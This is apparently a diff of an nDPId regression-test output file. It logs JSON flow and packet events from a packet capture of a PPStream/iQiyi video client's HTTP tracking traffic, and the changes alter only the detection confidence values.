+00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1091,"source":"pps.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353160157,"flow_last_seen":1467353160157,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1467353160157,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"239.255.255.250","src_port":63930,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00623{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1093,"source":"pps.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":1467353163154,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1467353163154,"pkt":"AQBef\/\/6bEAIlAI6CABFAACljZ0AAAERddjAqAUw7\/\/\/+vm6B2wAkVW0TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1108,"source":"pps.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353165300,"flow_last_seen":1467353165300,"flow_idle_time":7580000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353165300,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50495,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1108,"source":"pps.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1467353165300,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":946,"pkt_l4_len":912,"thread_ts_msec":1467353165300,"pkt":"TF4M6gNlABxCjnAxCABFAAOkGfJAAIAG0FjAqHMIymwO7MU\/AFBSz4AccUHHfVAYQTf+XQAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6MjM6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTI3NTU4JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1ODg3NCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxNjUwNDcmc2g9JnNxPSZzdz0mdD1zcCZ1PTBfYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj00Nzk1MzEwMDAmdnY9NS4yLjE1LjIyNDAmeD0meT1xY18xMDAwMDFfMTAwMTQwIEhUVFAvMS4xDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLUNODQpSZWZlcmVyOiBodHRwOi8vd3d3LmlxaXlpLmNvbS9jb21tb24vZmxhc2hwbGF5ZXIvMjAxNDA5MjQvTWFpblBsYXllcl81XzJfM19jM18yXzFfNi5zd2YNCnF5aWQ6IGFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDogXzIwMTINCnF5cGxhdGZvcm06IDAtMg0KeC1mbGFzaC12ZXJzaW9uOiAxMiwwLDAsNzANCkFjY2VwdDogKi8qDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgOC4wOyBXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMCkvUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQoNCg=="} -01296{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1108,"source":"pps.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353165300,"flow_last_seen":1467353165300,"flow_idle_time":7580000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353165300,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50495,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:23:23|45&av=4.10.004&b=180932301&c=31&ct=5000000927558&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000858874&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353165047&sh=&sq=&sw=&t=sp&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} +01296{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1108,"source":"pps.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353165300,"flow_last_seen":1467353165300,"flow_idle_time":7580000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353165300,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50495,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:23:23|45&av=4.10.004&b=180932301&c=31&ct=5000000927558&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000858874&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353165047&sh=&sq=&sw=&t=sp&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} 00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1109,"source":"pps.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":2,"flow_last_seen":1467353165410,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353165410,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5NehAADMGBE7KbA7swKhzCABQxT9xQcd9Us+DmFAYACAMewAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjA0IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1110,"source":"pps.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353165456,"flow_last_seen":1467353165456,"flow_idle_time":7580000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"thread_ts_msec":1467353165456,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50496,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 02137{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1110,"source":"pps.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1467353165456,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353165456,"pkt":"TF4M6gNlABxCjnAxCABFAAUUGh1AAIAGeifAqHMIZePIC8VAAFBgEsEemWlGj1AQ\/\/DZSAAAR0VUIC90cmFjazI\/YT0wJmFzPTE7MiwzOzQsNSZiPTE0NjczNTMxNjUmYz05NjY1NDJjODJhNTY5NGQwZTk0M2Q1MGQ1ZmNmNWE1NSZjdj01LjIuMTUuMjI0MCZkPTUwMDAwMDA4NTQ5MzQmZHI9MjE3NSZmPTRlM2FlNDE1YTU4NDc0OGFjOWFhMzE2MjhmMzlkMWU4Jmc9MF9hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbiZoPSZpPXFjXzEwMDAwMV8xMDAxNDAmaXY9MCZqPTMxJms9MTgwOTMyMzAxJmtwPTRlM2FlNDE1YTU4NDc0OGFjOWFhMzE2MjhmMzlkMWU4Jm49NDc5NTMxMDAwJm89MSZwPTEwMDAwMDAwMDAzODEmcT01MDAwMDAwOTIzNDQ3JnI9YzQ4ODllNjRhZDlkOWVlYjlmZjQzODkxMDg1MGM0NDImcnQ9MTQ2NzM1MzExMyZzPThlZGI2OTRjOGM4Y2NhOTIzZDNlYWU2NjIyZjlhZWU2JnN2PTQuMTAuMDA0JnU9MSZ1cD0mdj01MDAwMDAwODU0ODU4JnZlPTEmdz00LDUgSFRUUC8xLjENCkFjY2VwdC1MYW5ndWFnZTogemgtQ04NClJlZmVyZXI6IGh0dHA6Ly93d3cuaXFpeWkuY29tL2NvbW1vbi9mbGFzaHBsYXllci8yMDE0MDkyNC9NYWluUGxheWVyXzVfMl8zX2MzXzJfMV82LnN3Zg0KcXlpZDogYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOiBfMjAxMg0KcXlwbGF0Zm9ybTogMC0yDQp4LWZsYXNoLXZlcnNpb246IDEyLDAsMCw3MA0KQWNjZXB0OiAqLyoNClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzQuMCAoY29tcGF0aWJsZTsgTVNJRSA4LjA7IFdpbmRvd3MgTlQgNi4xOyBXT1c2NDsgVHJpZGVudC80LjA7IFNMQ0MyOyAuTkVUIENMUiAyLjAuNTA3Mjc7IC5ORVQgQ0xSIDMuNS4zMDcyOTsgLk5FVCBDTFIgMy4wLjMwNzI5OyBNZWRpYSBDZW50ZXIgUEMgNi4wKS9RWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBhcGkuY3VwaWQuaXFpeWkuY29tDQpDb29raWU6IHBwc19jbGllbnRfdmVyMj01LjIuMTUuMjI0MDsgVDAwNDA0PTRlM2FlNDE1YTU4NDc0OGFjOWFhMzE2MjhmMzlkMWU4OyBfcHBzX2l2aT1WazQ5TVRZd05UQTFMYVcvcFBtaFJ6OC9QNlRhcEVlbXVEOC9wTSt3Wmo4dHBMV3gzemd3cGxvL3BHYW9jU1pXVUQweEpsWkRQVDgvUHo4K3BMV3gzemd3cGxvL3BHYW9jU1pXU2owdE1TWldVejFXSmxaRVBTWldWRnRCWFQweU1UYzFKbFpOUFNaV1ZqMDFMakl1TVRVdU1qSTBNQ1pXVlQxb2RIUndPaTh2ZDNkM0xtbHhhWGxwTG1OdmJTOTJYekU1Y25K"} -01396{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1110,"source":"pps.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353165456,"flow_last_seen":1467353165456,"flow_idle_time":7580000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"thread_ts_msec":1467353165456,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50496,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"api.cupid.iqiyi.com","url":"api.cupid.iqiyi.com\/track2?a=0&as=1;2,3;4,5&b=1467353165&c=966542c82a5694d0e943d50d5fcf5a55&cv=5.2.15.2240&d=5000000854934&dr=2175&f=4e3ae415a584748ac9aa31628f39d1e8&g=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&h=&i=qc_100001_100140&iv=0&j=31&k=180932301&kp=4e3ae415a584748ac9aa31628f39d1e8&n=479531000&o=1&p=1000000000381&q=5000000923447&r=c4889e64ad9d9eeb9ff438910850c442&rt=1467353113&s=8edb694c8c8cca923d3eae6622f9aee6&sv=4.10.004&u=1&up=&v=5000000854858&ve=1&w=4,5","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} +01396{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1110,"source":"pps.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353165456,"flow_last_seen":1467353165456,"flow_idle_time":7580000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"thread_ts_msec":1467353165456,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50496,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"api.cupid.iqiyi.com","url":"api.cupid.iqiyi.com\/track2?a=0&as=1;2,3;4,5&b=1467353165&c=966542c82a5694d0e943d50d5fcf5a55&cv=5.2.15.2240&d=5000000854934&dr=2175&f=4e3ae415a584748ac9aa31628f39d1e8&g=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&h=&i=qc_100001_100140&iv=0&j=31&k=180932301&kp=4e3ae415a584748ac9aa31628f39d1e8&n=479531000&o=1&p=1000000000381&q=5000000923447&r=c4889e64ad9d9eeb9ff438910850c442&rt=1467353113&s=8edb694c8c8cca923d3eae6622f9aee6&sv=4.10.004&u=1&up=&v=5000000854858&ve=1&w=4,5","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} 00705{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1111,"source":"pps.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1467353165456,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":241,"pkt_l4_len":207,"thread_ts_msec":1467353165456,"pkt":"TF4M6gNlABxCjnAxCABFAADjGh5AAIAGflfAqHMIZePIC8VAAFBgEsYKmWlGj1AY\/\/BFbwAAc2RuVjRiR2N1YUhSdGJBPT07IFFDMDA2PXU1NDl2cHoxMGw5ZmthdHVtNGFsdzRicDsgUUMwMDg9MTQ2NjY0NTgxNi4xNDY2NjQ1ODE2LjE0NjY2NDU4MTYuMTsgSG1fbHZ0XzUzYjczNzRhNjNjMzc0ODNlNWRkOTdkNzhkOWJiMzZlPTE0NjY2NDU4MTc7IFFDMDA1PWFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQoNCg=="} 00788{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1112,"source":"pps.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1467353165492,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":306,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":306,"pkt_l4_len":272,"thread_ts_msec":1467353165492,"pkt":"ABxCjnAxTF4M6gNlCABFAAEkdU5AAC8Gc+Zl48gLwKhzCABQxUCZaUaPYBLGxVAYP\/ygXgAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjA1IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgNCkNvbnRlbnQtTGVuZ3RoOiAyDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQWNjZXNzLUNvbnRyb2wtQWxsb3ctQ3JlZGVudGlhbHM6IHRydWUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQoNCm9r"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1113,"source":"pps.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353165563,"flow_last_seen":1467353165563,"flow_idle_time":7580000,"flow_min_l4_payload_len":950,"flow_max_l4_payload_len":950,"flow_tot_l4_payload_len":950,"flow_avg_l4_payload_len":950,"midstream":1,"thread_ts_msec":1467353165563,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50497,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01721{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1113,"source":"pps.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1467353165563,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1004,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1004,"pkt_l4_len":970,"thread_ts_msec":1467353165563,"pkt":"TF4M6gNlABxCjnAxCABFAAPeGjdAAIAGvYPAqHMIe31wMcVBAFAj7VXd5qVx9VAYQTcqlQAAR0VUIC9ta3QuZ2lmP2FpPTg0NTI4OTE5MDBjOTAzYWU3YTg3NjQ0NzkyM2E1YWVjJmV0PTAgSFRUUC8xLjENCkFjY2VwdC1MYW5ndWFnZTogemgtQ04NClJlZmVyZXI6IGh0dHA6Ly93d3cuaXFpeWkuY29tL2NvbW1vbi9mbGFzaHBsYXllci8yMDE0MDkyNC9NYWluUGxheWVyXzVfMl8zX2MzXzJfMV82LnN3Zg0KcXlpZDogYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOiBfMjAxMg0KcXlwbGF0Zm9ybTogMC0yDQp4LWZsYXNoLXZlcnNpb246IDEyLDAsMCw3MA0KQWNjZXB0OiAqLyoNClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzQuMCAoY29tcGF0aWJsZTsgTVNJRSA4LjA7IFdpbmRvd3MgTlQgNi4xOyBXT1c2NDsgVHJpZGVudC80LjA7IFNMQ0MyOyAuTkVUIENMUiAyLjAuNTA3Mjc7IC5ORVQgQ0xSIDMuNS4zMDcyOTsgLk5FVCBDTFIgMy4wLjMwNzI5OyBNZWRpYSBDZW50ZXIgUEMgNi4wKS9RWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBjbGljay5obS5iYWlkdS5jb20NCkNvb2tpZTogSE1BQ0NPVU5UPTg4Q0M2OUIwNEM5RDYyOUE7IEhfTUtUX0NMS0lEPTAwMDAwMDAxNTlkYTE2Yjg1Nzc2MDgzMjVhMDhhMzc2MDAwMDAwMjAzNTMzNjUzMjM1NjUzMzMzNjUzMDM2MzQ2MzM2MzUzNzYzMzAzNjYyMzUzNTM4NjUzNTYzMzM2MzMzMzM2NjY0MDAwMDAwMDg3OTZmNzU3NDc1MmU2MjY1OyBIX01LVF9DTEtMT0c9MDAwMDAwMDE1OWRhMTZiODU3NzYwODMyNWEwOGEzNzYwMDAwMDAyMDM1MzM2NTMyMzU2NTMzMzM2NTMwMzYzNDYzMzYzNTM3NjMzMDM2NjIzNTM1Mzg2NTM1NjMzMzYzMzMzMzY2NjQwMDAwMDAwODc5NmY3NTc0NzUyZTYyNjU7IEJBSURVSUQ9MjEwMkRDNzUxRUQwREYzNkUzRDZDRjZDMjEwRkFCNzk6Rkc9MQ0KDQo="} -00989{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1113,"source":"pps.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353165563,"flow_last_seen":1467353165563,"flow_idle_time":7580000,"flow_min_l4_payload_len":950,"flow_max_l4_payload_len":950,"flow_tot_l4_payload_len":950,"flow_avg_l4_payload_len":950,"midstream":1,"thread_ts_msec":1467353165563,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50497,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"click.hm.baidu.com","url":"click.hm.baidu.com\/mkt.gif?ai=8452891900c903ae7a876447923a5aec&et=0","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} +00989{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1113,"source":"pps.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353165563,"flow_last_seen":1467353165563,"flow_idle_time":7580000,"flow_min_l4_payload_len":950,"flow_max_l4_payload_len":950,"flow_tot_l4_payload_len":950,"flow_avg_l4_payload_len":950,"midstream":1,"thread_ts_msec":1467353165563,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50497,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"click.hm.baidu.com","url":"click.hm.baidu.com\/mkt.gif?ai=8452891900c903ae7a876447923a5aec&et=0","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} 00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1114,"source":"pps.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":2,"flow_last_seen":1467353165612,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":241,"pkt_l4_len":207,"thread_ts_msec":1467353165612,"pkt":"ABxCjnAxTF4M6gNlCABFAADj3khAAC0GT217fXAxwKhzCABQxUHmpXH1I+1Zk1AYAIIWkgAASFRUUC8xLjEgMjA0IE5vIENvbnRlbnQNCkNvbnRlbnQtVHlwZTogaW1hZ2UvZ2lmDQpDYWNoZS1Db250cm9sOiBwcml2YXRlLCBtYXgtYWdlPTAsIG5vLWNhY2hlDQpQcmFnbWE6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjowNSBHTVQNClNlcnZlcjogYXBhY2hlDQoNCg=="} 01644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1115,"source":"pps.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":3,"flow_last_seen":1467353165616,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":946,"pkt_l4_len":912,"thread_ts_msec":1467353165616,"pkt":"TF4M6gNlABxCjnAxCABFAAOkGkVAAIAG0AXAqHMIymwO7MU\/AFBSz4OYcUHIDlAYQRL3fAAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6NDU6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTIzNDQ3JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1NDkzNCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxNjUwNDkmc2g9JnNxPSZzdz0mdD1zdCZ1PTBfYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj00Nzk1MzEwMDAmdnY9NS4yLjE1LjIyNDAmeD0meT1xY18xMDAwMDFfMTAwMTQwIEhUVFAvMS4xDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLUNODQpSZWZlcmVyOiBodHRwOi8vd3d3LmlxaXlpLmNvbS9jb21tb24vZmxhc2hwbGF5ZXIvMjAxNDA5MjQvTWFpblBsYXllcl81XzJfM19jM18yXzFfNi5zd2YNCnF5aWQ6IGFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDogXzIwMTINCnF5cGxhdGZvcm06IDAtMg0KeC1mbGFzaC12ZXJzaW9uOiAxMiwwLDAsNzANCkFjY2VwdDogKi8qDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgOC4wOyBXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMCkvUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQoNCg=="} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1116,"source":"pps.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":3,"flow_last_seen":1467353165659,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1467353165659,"pkt":"ABxCjnAxTF4M6gNlCABFAAAo3kpAAC0GUCZ7fXAxwKhzCABQxUHmpXKwI+1ZlFARAILziAAAAAAAAAAA"} 